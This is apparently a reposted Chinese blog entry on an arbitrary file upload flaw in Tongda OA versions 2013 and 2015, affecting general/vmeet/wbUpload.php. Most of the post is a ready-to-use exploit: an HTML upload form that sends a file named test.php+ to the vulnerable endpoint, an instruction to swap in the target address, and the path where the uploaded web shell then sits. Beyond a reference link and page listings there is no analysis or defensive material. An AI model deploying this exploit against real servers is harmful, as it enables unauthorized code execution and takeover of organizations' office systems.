null1433

参考

http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/11.html

 

影响版本

2013版本

2015版本

 

漏洞文件

general/vmeet/wbUpload.php

 

exp     修改标记的为目标地址

<form enctype="multipart/form-data" action="http://0-sec.org/general/vmeet/wbUpload.php
?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>

上传jpg之后shell地址为

http://0-sec.org/general/vmeet/wbUpload/test.php

分类:

技术点:

相关文章:

  • 2021-10-28
  • 2021-10-28
  • 2021-10-18
  • 2021-09-01
  • 2021-08-15
  • 2021-10-18
猜你喜欢
  • 2021-10-28
  • 2021-10-18
  • 2021-10-18
  • 2021-10-18
  • 2021-10-18
  • 2021-08-15
  • 2021-08-15
相关资源
相似解决方案